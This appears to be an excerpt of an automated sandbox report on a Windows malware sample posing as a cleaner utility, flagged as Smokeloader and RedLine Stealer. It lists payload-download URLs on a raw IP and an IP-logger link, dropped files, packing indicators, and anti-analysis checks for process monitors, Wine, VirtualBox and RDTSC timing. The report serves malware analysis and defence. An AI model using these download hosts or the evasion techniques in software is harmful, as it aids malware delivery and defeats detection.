00000000.00000003.2361967106.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadz
Source: file.exe, 00000000.00000002.2923721847.0000000000FC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download
Source: file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download.
Source: file.exe, 00000000.00000003.2611753282.0000000005779000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610619412.0000000005779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download;.C
Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CFFD000_3_04CFFD00
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CFDF870_3_04CFDF87
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D097060_3_04D09706
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CF31200_3_04CF3120
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CFE2C90_3_04CFE2C9
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CF22C00_3_04CF22C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D04AEE0_3_04D04AEE
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CFAA900_3_04CFAA90
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D052190_3_04D05219
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CF43500_3_04CF4350
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D200_2_00403D20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC00_2_00402EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F500_2_00404F50
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109000_2_00410900
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3060_2_0041A306
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EB870_2_0040EB87
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E190_2_00415E19
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EEC90_2_0040EEC9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156EE0_2_004156EE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6900_2_0040B690
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C130_2_00991C13
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00956C030_2_00956C03
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086D0650_2_0086D065
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009895CA0_2_009895CA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C39590_2_008C3959
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082615C0_2_0082615C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00829ABA0_2_00829ABA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E6230_2_0098E623
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099525A0_2_0099525A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00825BEA0_2_00825BEA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009937EB0_2_009937EB
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00920BE10_2_00920BE1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083FB100_2_0083FB10
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098CB320_2_0098CB32
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00915F7D0_2_00915F7D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B351B70_2_04B351B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B3EDEE0_2_04B3EDEE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B33F870_2_04B33F87
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B3B8F70_2_04B3B8F7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B351B70_2_04B351B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B3F1300_2_04B3F130
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B459550_2_04B45955
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B40B670_2_04B40B67
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: C:\Users\user\Desktop\file.exeCode function: String function: 04CF9B60 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 04B3A9C7 appears 35 times
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 572
Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe, 00000000.00000003.2629635379.0000000001159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.2629948063.00000000056D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0D08E CreateToolhelp32Snapshot,Module32First,0_2_00F0D08E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4308
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4Jump to behavior
Source: C:\Users\user\Desktop\file.exeCommand line argument: emp0_2_00408770
Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_00408770
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeVirustotal: Detection: 53%
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 572
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe
Source: file.exeStatic file information: File size 1933312 > 1048576
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: file.exeStatic PE information: Raw size of lerqcswm is bigger than: 0x100000 < 0x1a5e00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lerqcswm:EW;gsvpblsk:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: file.exeStatic PE information: real checksum: 0x1e4c55 should be: 0x1db476
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: lerqcswm
Source: file.exeStatic PE information: section name: gsvpblsk
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CF95F7 push ecx; ret 0_3_04CF960A
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D1037D push esi; ret 0_3_04D10386
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A1F7 push ecx; ret 0_2_0040A20A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push ecx; mov dword ptr [esp], ebx0_2_00991C23
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 1F8E6006h; mov dword ptr [esp], ecx0_2_00991CC5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push esi; mov dword ptr [esp], 00591716h0_2_00991D8C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push ecx; mov dword ptr [esp], esp0_2_00991DCE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 03C06AF7h; mov dword ptr [esp], edx0_2_00991E06
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push ebx; mov dword ptr [esp], esi0_2_00991E67
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 3E89B000h; mov dword ptr [esp], edx0_2_00991ECD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 06AC21A6h; mov dword ptr [esp], ebp0_2_00991FED
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push edi; mov dword ptr [esp], esi0_2_00992202
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push ecx; mov dword ptr [esp], 5DF5FA73h0_2_0099220D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push edi; mov dword ptr [esp], ecx0_2_0099228E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 71D2B2DAh; mov dword ptr [esp], ecx0_2_0099229F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 7B3B7F1Ah; mov dword ptr [esp], edx0_2_00992328
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push eax; mov dword ptr [esp], ebp0_2_0099238B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push eax; mov dword ptr [esp], 3FFFACA4h0_2_00992390
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 1000701Eh; mov dword ptr [esp], ebx0_2_00992410
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push esi; mov dword ptr [esp], ebp0_2_00992472
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push edi; mov dword ptr [esp], esi0_2_00992528
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push esi; mov dword ptr [esp], ebx0_2_00992562
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 6E6BFBE1h; mov dword ptr [esp], esi0_2_009925F9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push edx; mov dword ptr [esp], ecx0_2_009925FD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push eax; mov dword ptr [esp], 4DFDC500h0_2_00992601
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push ebp; mov dword ptr [esp], ecx0_2_0099263C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 7CE41199h; mov dword ptr [esp], edx0_2_00992644
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 79380AEAh; mov dword ptr [esp], ebx0_2_0099264D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991C13 push 26A56EE5h; mov dword ptr [esp], eax0_2_00992743
Source: file.exeStatic PE information: section name: lerqcswm entropy: 7.941431801128011
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]Jump to dropped file

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999D8A second address: 999DA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC23h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999DA1 second address: 999DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F8A2C4FB29Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999DB3 second address: 999DC5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8A2C7FDC1Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999DC5 second address: 999DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F8A2C4FB29Eh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8A2C4FB2A3h 0x00000014 jo 00007F8A2C4FB296h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999DF6 second address: 999DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
